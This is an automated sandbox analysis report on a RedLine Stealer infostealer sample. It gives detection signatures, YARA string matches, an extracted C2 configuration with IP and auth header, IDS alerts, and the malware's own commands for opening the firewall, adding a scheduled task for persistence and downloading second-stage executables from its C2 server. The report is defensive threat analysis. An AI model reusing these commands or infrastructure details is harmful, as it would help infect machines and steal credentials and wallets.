Windows Analysis Report
Fixer.exe

Overview

General Information

Sample name: Fixer.exe
Analysis ID: 1585853
MD5: 2acda1f917022e9e8081ad69b15330c6
SHA1: 3bad975d496a0066d64470e4ae1002794581c4f8
SHA256: 7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
Tags: exe, RedlineStealer, user-lontze7

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Fixer.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Fixer.exe" MD5: 2ACDA1F917022E9E8081AD69B15330C6)
    • 6z9uno0baqvej0me.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" MD5: 83AB0FD4D723DF8D361E8AE748A01B21)
    • FixerNerest.exe (PID: 5480 cmdline: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" MD5: 68A9294881810BC2CF709D03D710648D)
      • WmiPrvSE.exe (PID: 3504 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 6208 cmdline: "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6252 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 6404 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • Defender.exe (PID: 1684 cmdline: C:\Windows\System32\Defender.exe MD5: 33E16C50B29D01391849E46A442BD547)
    • WerFault.exe (PID: 5352 cmdline: C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Defender.exe (PID: 4284 cmdline: C:\Windows\System32\Defender.exe MD5: 33E16C50B29D01391849E46A442BD547)
    • WerFault.exe (PID: 6308 cmdline: C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source | Rule | Description | Author | Strings
Fixer.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Fixer.exe | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io |
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Fixer.exe PID: 2520 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Fixer.exe PID: 2520 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
0.0.Fixer.exe.fd0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.0.Fixer.exe.fd0000.0.unpack | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io |
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, ParentProcessId: 5480, ParentProcessName: FixerNerest.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, ProcessId: 6252, ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T11:14:55.961988+0100 | 2043234 | 1 | A Network Trojan was detected | 89.23.97.121 | 1112 | 192.168.2.5 | 49704 | TCP
2025-01-08T11:14:55.720981+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:01.275839+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:01.687450+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:01.944175+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:02.196357+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:02.989901+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:03.261408+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:03.540404+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:03.783245+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:04.027912+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:04.269642+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:04.542675+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:05.922830+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:06.166587+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:06.551563+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:06.556642+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:07.695845+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:07.939570+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:08.183648+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:08.860818+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:09.369770+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:09.611922+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:09.853674+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:13.309606+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:13.571017+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:14:55.720981+0100 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:15:12.809416+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 89.23.97.121 | 1911 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | Avira: detection malicious, Label: HEUR/AGEN.1310090
Source: C:\Windows\System32\Defender.exe | Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: Fixer.exe | Malware Configuration Extractor: RedLine {"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: Fixer.exe | Virustotal: Detection: 73%
Source: Fixer.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Joe Sandbox ML: detected
Source: Fixer.exe | Joe Sandbox ML: detected
Source: Fixer.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fixer.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49704 -> 89.23.97.121:1112
Source: Network traffic | Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49704 -> 89.23.97.121:1112
Source: Network traffic | Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.23.97.121:1112 -> 192.168.2.5:49704
Source: Malware configuration extractor | URLs: 89.23.97.121:1112
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 1911
Source: unknown | Network traffic detected: HTTP traffic on port 1911 -> 49705
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 89.23.97.121:1112
Source: global traffic | TCP traffic: 192.168.2.5:49832 -> 147.185.221.24:61069
Source: global traffic | HTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1 Host: 89.23.97.121:1911 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /FixerNerest.exe HTTP/1.1 Host: 89.23.97.121:1911
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 89.23.97.121:1911
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.121
Source: global traffic | DNS traffic detected: DNS query: et-seattle.gl.at.ply.gg
Source: Fixer.exe, 00000000.00000002.2202938412.000000000360E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003604000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.121:1911
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003604000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.121:1911/6z9uno0baqvej0me.exe
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.121:1911/FixerNerest.exe
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0$
                  Source: Fixer.exe, 00000000.00000002.2248608403.0000000009490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://s.symcd.com06
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
